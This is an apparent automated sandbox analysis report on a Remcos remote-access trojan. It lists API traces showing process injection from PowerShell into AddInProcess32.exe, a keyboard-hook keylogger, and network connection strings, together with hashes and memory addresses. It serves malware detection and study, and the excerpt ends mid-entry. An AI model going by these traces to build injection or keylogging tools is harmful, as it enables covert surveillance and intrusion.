Instruction Fuzzy Hash: EE210742E8E6C28FF316876868151B95F93BFB2694F4840B7D0485B1DBE95A8D19C382

Analysis Process: powershell.exePID: 8080, Parent PID: 7964COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	23
Total number of Limit Nodes:	3

Executed Functions

Function 00007FF886C4B5AB Relevance: 3.3, APIs: 2, Instructions: 271
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FF886C4B63D

Memory Dump Source

Source File: 00000008.00000002.1621831781.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886c40000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dbc85ae9f7278070fd7c72aa2c3f6bb5b4e8d1fa5fb03bd68f4508603ddef319
Instruction ID: 588445d92971a679f8bac7fda0a6beabb7040cb9e692829ef0de3aeff21ce1fb
Opcode Fuzzy Hash: dbc85ae9f7278070fd7c72aa2c3f6bb5b4e8d1fa5fb03bd68f4508603ddef319
Instruction Fuzzy Hash: A781903190CA1C8FDB59DF58D846BE9BBF1FB99321F0442AAD00DD7251DA34A986CB81

Function 00007FF886C4B755 Relevance: 1.6, APIs: 1, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNELBASE ref: 00007FF886C4B824

Memory Dump Source

Source File: 00000008.00000002.1621831781.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886c40000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 49e5d4ae5c36f2c3a136c5378865d8d7ae4cdd276c8a0d8f6d07be49829b5945
Instruction ID: 1f198f5d242ae024f6ca57fad4d8f02de22e4f5d1cc30fe90fd799f0e047d501
Opcode Fuzzy Hash: 49e5d4ae5c36f2c3a136c5378865d8d7ae4cdd276c8a0d8f6d07be49829b5945
Instruction Fuzzy Hash: E941E63190C7888FDB16DF6898857E97FE1EF56320F08429BD448C7156DB64A805CB92

Function 00007FF886C4BB00 Relevance: 1.6, APIs: 1, Instructions: 126
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FF886C4BBC0

Memory Dump Source

Source File: 00000008.00000002.1621831781.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886c40000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d9eb50fc2550371b15aebc68771aa04cadc5748eb887514c59f6c9e4067ee174
Instruction ID: d12904172d5f01045339ea1219610952b811196c28926a748129a0d6bdfbb031
Opcode Fuzzy Hash: d9eb50fc2550371b15aebc68771aa04cadc5748eb887514c59f6c9e4067ee174
Instruction Fuzzy Hash: 6731B03191CB588FDB18DF98D8456E97BF1FB99321F04426FE089D3252CB74A849CB92

Function 00007FF886C4BC05 Relevance: 1.6, APIs: 1, Instructions: 101
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FF886C4BC9C

Memory Dump Source

Source File: 00000008.00000002.1621831781.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886c40000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 57bc68e0d16493b89c2a87fdd45894998b204534cf49b20b7069a58d661f2f35
Instruction ID: 4dae5733ad30ce7b79a3d988ecf52fd4813be807407269def52f94923e7cc8e3
Opcode Fuzzy Hash: 57bc68e0d16493b89c2a87fdd45894998b204534cf49b20b7069a58d661f2f35
Instruction Fuzzy Hash: E231F23090CA4C8FDB59DB58C845BE9BBE1FF56321F04426FD049D3692DB74A416CB81

Function 00007FF886D1031B Relevance: .2, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1622404706.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 469a64481be4127e0aed438dd8ac39311b1c65c62761003f3e8f52c6e478ec8e
Instruction ID: 942be11950bd9523cf67129de299d97c8109dcb197ecb687fadfab4095813e35
Opcode Fuzzy Hash: 469a64481be4127e0aed438dd8ac39311b1c65c62761003f3e8f52c6e478ec8e
Instruction Fuzzy Hash: 0A712531A0DBC94FE796AB6848646B5BBE0FF66250F4800FBD08ECB193ED699C05C751

Function 00007FF886D185FE Relevance: .2, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1622404706.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d1598aee9e6a5c0691b68740c5e40baa4bc871b45aa8318f159437a00b2d33
Instruction ID: 729fa5f7883d3752dfa7b357c1956ebd999eb3f827a3c53bb6b2c71884b414a3
Opcode Fuzzy Hash: 59d1598aee9e6a5c0691b68740c5e40baa4bc871b45aa8318f159437a00b2d33
Instruction Fuzzy Hash: C7612432F1DE8A0FE7A9D66C18652B5E6D2FF952A0B5841BAC00FCB1D3ED599C04C381

Function 00007FF886D1077C Relevance: .2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1622404706.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ae7e255e61c6b8554d54e9350d12c34f245a1946f0705589af85c2689e8797
Instruction ID: 4b67fa85fa8d71e087467b7dee6a90f520479478773130f7d4973f130d1713f7
Opcode Fuzzy Hash: 26ae7e255e61c6b8554d54e9350d12c34f245a1946f0705589af85c2689e8797
Instruction Fuzzy Hash: D8418672A1CB998FEB55EF5CA4422A87BD0FF45760F1401BBD44AC3152DA26BC45C7C1

Function 00007FF886D1864A Relevance: .1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1622404706.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c71fd81f34793ccaf88e63a1f4f8a88d87cd377a373816c32a56f0302d1b0ac
Instruction ID: 72120b60a8e7bf7536447dfc36e1493189508bd61834c14c3c9f51872f935999
Opcode Fuzzy Hash: 6c71fd81f34793ccaf88e63a1f4f8a88d87cd377a373816c32a56f0302d1b0ac
Instruction Fuzzy Hash: 1641C432E2EE8B0FF2A5D66818A5275D6C1FF952A4B9841BAC40ECB1D3ED5E9C05C341

Function 00007FF886D172CA Relevance: .1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1622404706.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56798a5014923a9e497a2fd107f59158b3a6f33dcca9a276985875b646493b3
Instruction ID: 0109006718127d1a816a277c6dca79039e41507cf9b0d89bf3749fb2c64f0b22
Opcode Fuzzy Hash: b56798a5014923a9e497a2fd107f59158b3a6f33dcca9a276985875b646493b3
Instruction Fuzzy Hash: D1310452E0EBC90FE357866C2864170BFE1EF9625074D01FBD58ACB1E7E84A9C06C391

Function 00007FF886D1725D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1622404706.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff886d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3af2e6ed6ec020dae6e9b3e037582a59ac8869f02756870b178fc2094ef9c4
Instruction ID: 3c666847b4859ca5595b9787be3099c5b72285256a85fa0d4c6e7338e9e26eee
Opcode Fuzzy Hash: 9c3af2e6ed6ec020dae6e9b3e037582a59ac8869f02756870b178fc2094ef9c4
Instruction Fuzzy Hash: 8501D622E1EA894FD391EBBC2454268BBE0FF4569071440FED04DCB1E7E81D4C098312

Analysis Process: AddInProcess32.exePID: 7444, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.6%
Total number of Nodes:	1174
Total number of Limit Nodes:	50

Executed Functions

Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
GetProcAddress.KERNEL32(00000000), ref: 0041A912
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
GetProcAddress.KERNEL32(00000000), ref: 0041A927
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
GetProcAddress.KERNEL32(00000000), ref: 0041A940
GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
GetProcAddress.KERNEL32(00000000), ref: 0041A954
GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
GetProcAddress.KERNEL32(00000000), ref: 0041A96C
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
GetProcAddress.KERNEL32(00000000), ref: 0041A980
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
GetProcAddress.KERNEL32(00000000), ref: 0041A98F
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
GetProcAddress.KERNEL32(00000000), ref: 0041AA22
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
GetProcAddress.KERNEL32(00000000), ref: 0041AA33
LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
GetProcAddress.KERNEL32(00000000), ref: 0041AA43

Strings

IsUserAnAdmin, xrefs: 0041A9B6
shcore, xrefs: 0041A94C
GetComputerNameExW, xrefs: 0041A9A6
GetSystemTimes, xrefs: 0041AA0F
ntdll.dll, xrefs: 0041A978
NtUnmapViewOfSection, xrefs: 0041A973
EnumDisplayDevicesW, xrefs: 0041A9DA
IsWow64Process, xrefs: 0041A991
Psapi.dll, xrefs: 0041A8EA, 0041A91F
GlobalMemoryStatusEx, xrefs: 0041A982
GetModuleFileNameExW, xrefs: 0041A919, 0041A91E, 0041A937
Kernel32.dll, xrefs: 0041A90A, 0041A938
Shell32, xrefs: 0041A9BB
SetProcessDEPPolicy, xrefs: 0041A9CA
Shlwapi.dll, xrefs: 0041AA26
user32, xrefs: 0041A964, 0041A9DF, 0041A9E9, 0041A9F4, 0041AA04
GetMonitorInfoW, xrefs: 0041A9FF
kernel32, xrefs: 0041A996, 0041A9A0, 0041A9AB, 0041A9CF
GetConsoleWindow, xrefs: 0041AA35
GetModuleFileNameExA, xrefs: 0041A8E4, 0041A8E9, 0041A909
kernel32.dll, xrefs: 0041A987, 0041AA14, 0041AA1E, 0041AA3A
SetProcessDpiAware, xrefs: 0041A95F
EnumDisplayMonitors, xrefs: 0041A9EF
SetProcessDpiAwareness, xrefs: 0041A947

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
API String ID: 551388010-2474455403
Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
GetLastError.KERNEL32 ref: 00409375

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
TranslateMessage.USER32(?), ref: 004093D2
DispatchMessageA.USER32(?), ref: 004093DD

Strings

Keylogger initialization failure: error , xrefs: 00409389

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
Opcode Fuzzy Hash: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A

Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411F34: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
Part of subcall function 00411F34: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
Part of subcall function 00411F34: RegCloseKey.KERNELBASE(?), ref: 00411F7D

Sleep.KERNELBASE(00000BB8), ref: 0040E243
ExitProcess.KERNEL32 ref: 0040E2B4

Strings

override, xrefs: 0040E1B2
3.8.0 Pro, xrefs: 0040E21E, 0040E28D
!G, xrefs: 0040E19E
pth_unenc, xrefs: 0040E1A3, 0040E1EC, 0040E25B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.8.0 Pro$override$pth_unenc$!G
API String ID: 2281282204-1386060931
Opcode ID: a288d8616e236b4235b05259e5913bb087acfdbfedd53e6c5eb68c0c5d578e2c
Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
Opcode Fuzzy Hash: a288d8616e236b4235b05259e5913bb087acfdbfedd53e6c5eb68c0c5d578e2c
Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF

Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocalTime.KERNEL32(?), ref: 00404F61
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
CreateThread.KERNELBASE(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0

Strings

Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: Connection KeepAlive | Enabled | Timeout:
API String ID: 2532271599-507513762
Opcode ID: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
Opcode Fuzzy Hash: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA

Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00A38578), ref: 004315FE
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C

Function 004195F8 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNELBASE(00000001,?,00000037,00471FFC), ref: 00419615
GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
Opcode Fuzzy Hash: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98

Function 00424A66 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00424A70

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
Instruction ID: 0df3b2746f7319e4a339c8fc0296cb6b5099ceb5184c402daa9575d879af207d
Opcode Fuzzy Hash: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
Instruction Fuzzy Hash: 81B09B75105201BFC6150750CD0486E7DA597C8381B40491CB14641171C535C4505715

Function 0040D3F0 Relevance: 72.5, APIs: 17, Strings: 24, Instructions: 774
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603

Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992

Strings

H"G, xrefs: 0040D9B8
Inj, xrefs: 0040D626, 0040D62C, 0040D641
!G, xrefs: 0040D8F2
`"G, xrefs: 0040DCA3
Remcos Agent initialized, xrefs: 0040DA83
!G, xrefs: 0040D8AC
Administrator, xrefs: 0040DD08
license_code.txt, xrefs: 0040D465
Exe, xrefs: 0040D534
!G, xrefs: 0040D919
origmsc, xrefs: 0040D6F7
exepath, xrefs: 0040D931, 0040D9DB
(#G, xrefs: 0040D596
0"G, xrefs: 0040D656
Software\, xrefs: 0040D4E6
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 0040D68F, 0040D8A7
0"G, xrefs: 0040D586
H"G, xrefs: 0040D904
!G, xrefs: 0040D9F6
Access Level: , xrefs: 0040DD3D
User, xrefs: 0040DD2C
!G, xrefs: 0040D8B6
licence, xrefs: 0040DA22
0"G, xrefs: 0040D52A

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
API String ID: 1529173511-2670159127
Opcode ID: 191fccb656f8d7f165d290c2b67912a784eae3ac7d936866211ee0fc0bf2c808
Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
Opcode Fuzzy Hash: 191fccb656f8d7f165d290c2b67912a784eae3ac7d936866211ee0fc0bf2c808
Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

Function 00413980 Relevance: 37.5, APIs: 5, Strings: 16, Instructions: 785
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,76F90F10,00471FFC,00000000), ref: 004139D1
WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
Sleep.KERNELBASE(00000000,00000002), ref: 004144C7

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

Connection Error: , xrefs: 00413BF5
3.8.0 Pro, xrefs: 00413F03
Connected | , xrefs: 00413CA4
Disconnected, xrefs: 00414437
!G, xrefs: 00413E30
TLS Off, xrefs: 00413B3B
H"G, xrefs: 00413D96
Connecting | , xrefs: 00413B5E
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 00413E16
| , xrefs: 00413B68, 00413CA9
hlight, xrefs: 00413DE9
%I64u, xrefs: 00413D4C
name, xrefs: 00413DBC
`"G, xrefs: 00413F36
Connection Error: Unable to create socket, xrefs: 00413C40
TLS On , xrefs: 00413B49

Memory Dump Source

